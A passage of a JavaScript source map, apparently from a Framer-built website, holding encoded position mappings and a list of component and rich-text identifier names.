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",
  "names": ["init_ssg_sandbox_shims", "richText", "u", "x", "p", "Link", "motion", "ComponentPresetsConsumer", "t", "CodeBlock_default", "richText1", "richText2", "richText3", "richText4", "richText5", "richText6", "richText7", "richText8", "__FramerMetadata__"]
}
